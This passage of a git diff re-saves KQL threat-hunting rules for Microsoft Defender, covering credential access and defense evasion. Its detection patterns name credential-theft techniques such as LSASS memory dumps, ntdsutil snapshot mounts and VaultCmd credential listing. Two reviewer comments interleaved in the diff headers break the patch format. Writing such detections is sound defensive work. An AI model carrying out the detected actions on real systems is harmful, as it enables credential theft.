 | where ((ProcessCommandLine contains "snapshot" and ProcessCommandLine contains "mount ") or (ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds")) and (FolderPath endswith "\\ntdsutil.exe" or ProcessVersionInfoOriginalFileName =~ "ntdsutil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql b/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql
index 0f3e9379..6da102e1 100644
--- a/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql
+++ b/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql
@@ -1,12 +1,12 @@
-// Title: VolumeShadowCopy Symlink Creation Via Mklink
-// Author: Teymur Kheirkhabarov, oscd.community
-// Date: 2019-10-22
-// Level: high
-// Description: Shadow Copies storage symbolic link creation using operating systems utilities
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003
-// False Positives:
-// - Legitimate administrator working with shadow copies, access for backup purposes
-
-DeviceProcessEvents
+// Title: VolumeShadowCopy Symlink Creation Via Mklink
+// Author: Teymur Kheirkhabarov, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Shadow Copies storage symbolic link creation using operating systems utilities
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003
+// False Positives:
+// - Legitimate administrator working with shadow copies, access for backup purposes
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "mklink" and ProcessCommandLine contains "HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/wce_wceaux_dll_access.kql b/KQL/rules/Credential Access/wce_wceaux_dll_access.kql
index a0776d36..8983af2a 100644
--- a/KQL/rules/Credential Access/wce_wceaux_dll_access.kql
+++ b/KQL/rules/Credential Access/wce_wceaux_dll_access.kql
@@ -1,10 +1,10 @@
-// Title: WCE wceaux.dll Access
-// Author: Thomas Patzke
-// Date: 2017-06-14
-// Level: critical
-// Description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003, attack.s0005
-
-DeviceRegistryEvents
+// Title: WCE wceaux.dll Access
+// Author: Thomas Patzke
+// Date: 2017-06-14
+// Level: critical
+// Description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.s0005
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\wceaux.dll"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql b/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql
index 00e03537..d8b77bc4 100644
--- a/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql
+++ b/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql
@@ -1,10 +1,10 @@
-// Title: WerFault LSASS Process Memory Dump
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-06-27
-// Level: high
-// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-
-DeviceFileEvents
+// Title: WerFault LSASS Process Memory Dump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-27
+// Level: high
+// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\WerFault.exe" and (FolderPath contains "\\lsass" or FolderPath contains "lsass.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/windows_credential_editor_registry.kql b/KQL/rules/Credential Access/windows_credential_editor_registry.kql
index 394f6e39..40b58969 100644
--- a/KQL/rules/Credential Access/windows_credential_editor_registry.kql
+++ b/KQL/rules/Credential Access/windows_credential_editor_registry.kql
@@ -1,10 +1,10 @@
-// Title: Windows Credential Editor Registry
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-12-31
-// Level: critical
-// Description: Detects the use of Windows Credential Editor (WCE)
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001, attack.s0005
-
-DeviceRegistryEvents
+// Title: Windows Credential Editor Registry
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-12-31
+// Level: critical
+// Description: Detects the use of Windows Credential Editor (WCE)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.s0005
+
+DeviceRegistryEvents
 | where RegistryKey contains "Services\\WCESERVICE\\Start"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql b/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql
index 86a64afd..9c0ad9c7 100644
--- a/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql
+++ b/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql
@@ -1,10 +1,10 @@
-// Title: Windows Credential Manager Access via VaultCmd
-// Author: frack113
-// Date: 2022-04-08
-// Level: medium
-// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555.004
-
-DeviceProcessEvents
+// Title: Windows Credential Manager Access via VaultCmd
+// Author: frack113
+// Date: 2022-04-08
+// Level: medium
+// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/listcreds:" and (FolderPath endswith "\\VaultCmd.exe" or ProcessVersionInfoOriginalFileName =~ "VAULTCMD.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql
index a4241782..c0db6966 100644
--- a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql
+++ b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql
@@ -1,10 +1,10 @@
-// Title: .RDP File Created By Uncommon Application
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-18
-// Level: high
-// Description: Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceFileEvents
+// Title: .RDP File Created By Uncommon Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-18
+// Level: high
+// Description: Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleaner Browser\\Application\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\Opera.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Whale.exe" or InitiatingProcessFolderPath endswith "\\olk.exe" or InitiatingProcessFolderPath endswith "\\Outlook.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\Thunderbird.exe" or InitiatingProcessFolderPath endswith "\\Discord.exe" or InitiatingProcessFolderPath endswith "\\Keybase.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\Slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and FolderPath endswith ".rdp"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql b/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql
index ab1041ea..b20ff3c4 100644
--- a/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql
+++ b/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql
@@ -1,10 +1,10 @@
-// Title: Abused Debug Privilege by Arbitrary Parent Processes
-// Author: Semanur Guneysu @semanurtg, oscd.community
-// Date: 2020-10-28
-// Level: high
-// Description: Detection of unusual child processes by different system processes
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
-
-DeviceProcessEvents
+// Title: Abused Debug Privilege by Arbitrary Parent Processes
+// Author: Semanur Guneysu @semanurtg, oscd.community
+// Date: 2020-10-28
+// Level: high
+// Description: Detection of unusual child processes by different system processes
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+
+DeviceProcessEvents
 | where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "Cmd.Exe"))) and ((InitiatingProcessFolderPath endswith "\\winlogon.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains " route " and ProcessCommandLine contains " ADD ")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/abusing_print_executable.kql b/KQL/rules/Defense Evasion/abusing_print_executable.kql
index c16b9ebe..c6fb01db 100644
--- a/KQL/rules/Defense Evasion/abusing_print_executable.kql
+++ b/KQL/rules/Defense Evasion/abusing_print_executable.kql
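Review bot: The `(AccountName contains "AUTHORI" or AccountName contains "AUTORI")` clause on the `| where` context line looks like a verbatim carry-over of a Sigma `User|contains` selector, but in the Defender for Endpoint process schema the "NT AUTHORITY" portion of the principal is held in AccountDomain while AccountName carries only the user part (e.g. SYSTEM), so this clause would never be true and, being AND-ed with the parent-process test, silences the whole rule. If that reading of the schema is right, `(AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI")` is the minimal fix; since these files appear to be converter output, the mapping should be corrected in the conversion script rather than by hand-editing the generated rule. The same clause appears in the Always Install Elevated Windows Installer hunk further down, where the identical correction applies.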
@@ -1,10 +1,10 @@
-// Title: Abusing Print Executable
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
-// Date: 2020-10-05
-// Level: medium
-// Description: Attackers can use print.exe for remote file copy
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Abusing Print Executable
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
+// Date: 2020-10-05
+// Level: medium
+// Description: Attackers can use print.exe for remote file copy
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "/D" and ProcessCommandLine contains ".exe") and ProcessCommandLine startswith "print" and FolderPath endswith "\\print.exe") and (not(ProcessCommandLine contains "print.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql
index 247df255..e6f05bb3 100644
--- a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql
+++ b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql
@@ -1,13 +1,13 @@
-// Title: Add Insecure Download Source To Winget
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-17
-// Level: high
-// Description: Detects usage of winget to add a new insecure (http) download source.
-// Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059
-// False Positives:
-// - False positives might occur if the users are unaware of such control checks
-
-DeviceProcessEvents
+// Title: Add Insecure Download Source To Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects usage of winget to add a new insecure (http) download source.
+// Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+// - False positives might occur if the users are unaware of such control checks
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql
index ee5872f8..e2f2f08a 100644
--- a/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql
+++ b/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql
@@ -1,12 +1,12 @@
-// Title: Add New Download Source To Winget
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-17
-// Level: medium
-// Description: Detects usage of winget to add new additional download sources
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059
-// False Positives:
-// - False positive are expected with legitimate sources
-
-DeviceProcessEvents
+// Title: Add New Download Source To Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects usage of winget to add new additional download sources
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+// - False positive are expected with legitimate sources
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql
index a18d27f0..aab102c7 100644
--- a/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql
+++ b/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql
@@ -1,10 +1,10 @@
-// Title: Add Potential Suspicious New Download Source To Winget
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-17
-// Level: medium
-// Description: Detects usage of winget to add new potentially suspicious download sources
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Add Potential Suspicious New Download Source To Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects usage of winget to add new potentially suspicious download sources
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql b/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql
index 548ac8af..dcc7fd44 100644
--- a/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql
+++ b/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql
@@ -1,12 +1,12 @@
-// Title: Add SafeBoot Keys Via Reg Utility
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-02
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Add SafeBoot Keys Via Reg Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-02
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " copy " or ProcessCommandLine contains " add ") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql b/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql
index 1c181326..53dbd2bb 100644
--- a/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql
+++ b/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql
@@ -1,10 +1,10 @@
-// Title: AddinUtil.EXE Execution From Uncommon Directory
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023-09-18
-// Level: medium
-// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: AddinUtil.EXE Execution From Uncommon Directory
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe") and (not((FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql b/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql
index d0c05759..c81b7387 100644
--- a/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql
+++ b/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql
@@ -1,12 +1,12 @@
-// Title: ADS Zone.Identifier Deleted By Uncommon Application
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-09-04
-// Level: medium
-// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.004
-// False Positives:
-// - Other third party applications not listed.
-
-DeviceFileEvents
+// Title: ADS Zone.Identifier Deleted By Uncommon Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+// - Other third party applications not listed.
+
+DeviceFileEvents
 | where FolderPath endswith ":Zone.Identifier" and (not((InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\explorer.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql b/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql
index 408b1e6b..1c055f70 100644
--- a/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql
+++ b/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql
@@ -1,12 +1,12 @@
-// Title: AgentExecutor PowerShell Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
-// Date: 2022-12-24
-// Level: medium
-// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate
-
-DeviceProcessEvents
+// Title: AgentExecutor PowerShell Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
+// Date: 2022-12-24
+// Level: medium
+// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath =~ "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not(InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql b/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql
index 69e25b00..3689f997 100644
--- a/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql
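Review bot: `FolderPath =~ "\\AgentExecutor.exe"` on the `| where` context line is an equality test against a bare file name, and FolderPath holds the full image path, so this half of the image check can never be true; the rule only fires when the ProcessVersionInfoOriginalFileName alternative matches, which silently narrows it. Every sibling rule in this diff pairs the original-file-name test with `FolderPath endswith`, so the intended line is `(FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")`. Presumably the `endswith` modifier was lost in conversion; since the commit describes these files as script output, the fix belongs in the converter so it is not undone on the next regeneration.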
+++ b/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql
@@ -1,10 +1,10 @@
-// Title: Always Install Elevated MSI Spawned Cmd And Powershell
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
-// Date: 2020-10-13
-// Level: medium
-// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-
-DeviceProcessEvents
+// Title: Always Install Elevated MSI Spawned Cmd And Powershell
+// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((InitiatingProcessFolderPath contains "\\Windows\\Installer\\" and InitiatingProcessFolderPath contains "msi") and InitiatingProcessFolderPath endswith "tmp")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql b/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql
index d620caf0..8501908f 100644
--- a/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql
+++ b/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql
@@ -1,14 +1,14 @@
-// Title: Always Install Elevated Windows Installer
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
-// Date: 2020-10-13
-// Level: medium
-// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
-// False Positives:
-// - System administrator usage
-// - Anti virus products
-// - WindowsApps located in "C:\Program Files\WindowsApps\"
-
-DeviceProcessEvents
+// Title: Always Install Elevated Windows Installer
+// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+// False Positives:
+// - System administrator usage
+// - Anti virus products
+// - WindowsApps located in "C:\Program Files\WindowsApps\"
+
+DeviceProcessEvents
 | where (((FolderPath contains "\\Windows\\Installer\\" and FolderPath contains "msi") and FolderPath endswith "tmp") or (FolderPath endswith "\\msiexec.exe" and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384")))) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\Avast Software\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avast Software\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Avira\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\Google\\Update\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Google\\Update\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe" or (ProcessCommandLine endswith "\\system32\\msiexec.exe /V" or 
InitiatingProcessCommandLine endswith "\\system32\\msiexec.exe /V") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Sophos\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql b/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql
index e1bcca0c..6a46db3a 100644
--- a/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql
+++ b/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql
@@ -1,10 +1,10 @@
-// Title: Amsi.DLL Loaded Via LOLBIN Process
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-01
-// Level: medium
-// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceImageLoadEvents
+// Title: Amsi.DLL Loaded Via LOLBIN Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\amsi.dll" and (InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\odbcconf.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
index f0cb21a5..7489d25a 100644
--- a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
+++ b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
@@ -1,12 +1,12 @@
-// Title: Antivirus Filter Driver Disallowed On Dev Drive - Registry
-// Author: @kostastsale, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-11-05
-// Level: high
-// Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
